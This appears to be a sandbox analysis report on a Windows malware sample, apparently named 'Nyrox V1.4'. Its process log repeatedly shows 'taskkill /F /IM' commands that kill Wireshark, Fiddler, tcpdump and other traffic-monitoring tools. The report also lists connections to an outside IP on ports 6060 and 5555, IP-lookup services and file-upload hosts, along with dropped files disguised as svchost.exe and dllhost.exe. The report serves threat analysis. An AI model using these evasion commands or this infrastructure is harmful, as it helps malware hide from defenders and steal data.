taskkill /F /IM httpdebuggerui.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM wireshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tcpdump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\taskkill.exe

taskkill /F /IM ettercap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM dumpcap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM windump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\taskkill.exe

taskkill /F /IM fiddler.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM httpdebuggerui.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\taskkill.exe

taskkill /F /IM wireshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\taskkill.exe

taskkill /F /IM tshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tcpdump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM ettercap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM dumpcap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM windump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM fiddler.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\taskkill.exe

taskkill /F /IM httpdebuggerui.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM wireshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\taskkill.exe

taskkill /F /IM tshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tcpdump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\taskkill.exe

taskkill /F /IM ettercap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\taskkill.exe

taskkill /F /IM dumpcap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM windump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM fiddler.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM httpdebuggerui.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\taskkill.exe

taskkill /F /IM wireshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\taskkill.exe

taskkill /F /IM tcpdump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM ettercap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM dumpcap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM windump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM fiddler.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM httpdebuggerui.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM wireshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tcpdump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM ettercap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM dumpcap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM windump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM fiddler.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM httpdebuggerui.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM wireshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tcpdump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM ettercap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM dumpcap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM windump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM fiddler.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM httpdebuggerui.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM wireshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tcpdump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM ettercap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM dumpcap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\taskkill.exe

taskkill /F /IM windump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM fiddler.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM httpdebuggerui.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM wireshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tcpdump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM ettercap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM dumpcap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM windump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM fiddler.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM httpdebuggerui.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM wireshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tcpdump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM ettercap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM dumpcap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM windump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM fiddler.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM httpdebuggerui.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM wireshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe

"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe" -ServerName:MiniSearchUI.AppXj3y73at8fy1htwztzxs68sxx1v7cksp7.mca

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM httpdebuggerui.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM wireshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tcpdump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM ettercap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM dumpcap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM windump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM fiddler.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM httpdebuggerui.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM wireshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tcpdump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM ettercap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM dumpcap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM windump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM fiddler.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM httpdebuggerui.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM wireshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tcpdump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM ettercap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM dumpcap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM windump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM fiddler.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM httpdebuggerui.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM wireshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tcpdump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM ettercap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM dumpcap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM windump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM fiddler.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM httpdebuggerui.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM wireshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tcpdump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM ettercap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM dumpcap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM windump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM fiddler.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM httpdebuggerui.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM wireshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tcpdump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM ettercap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM dumpcap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM windump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM fiddler.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM httpdebuggerui.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM wireshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tcpdump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM ettercap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM dumpcap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM windump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM fiddler.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM httpdebuggerui.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM wireshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tcpdump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM ettercap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM dumpcap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM windump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM fiddler.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM httpdebuggerui.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM wireshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tcpdump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM ettercap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM dumpcap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM windump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM fiddler.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM httpdebuggerui.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM wireshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tcpdump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM ettercap.exe

Network

Country Destination Domain Proto
NL 91.92.241.69:6060 91.92.241.69 tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 104.26.13.205:443 api.ipify.org tcp
US 34.117.186.192:443 ipinfo.io tcp
FR 45.112.123.227:443 store1.gofile.io tcp
US 172.67.204.206:443 freeimage.host tcp
NL 91.92.241.69:6060 91.92.241.69 tcp
NL 91.92.241.69:5555 tcp
N/A 127.0.0.1:51014 tcp
US 8.8.8.8:53 tcp
NL 91.92.241.69:6060 91.92.241.69 tcp
US 206.168.191.31:443 store8.gofile.io tcp
US 104.26.13.205:443 api.ipify.org tcp
US 34.117.186.192:443 ipinfo.io tcp
US 206.168.191.31:443 store8.gofile.io tcp
US 172.67.204.206:443 freeimage.host tcp
NL 91.92.241.69:6060 91.92.241.69 tcp
N/A 127.0.0.1:52124 tcp

Files

C:\Users\Admin\AppData\Roaming\svchost.exe

C:\Users\Admin\dllhost.exe

C:\Users\Admin\AppData\Local\Temp\Nyrox V1.4.EXE

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_k2q1np22.yti.ps1

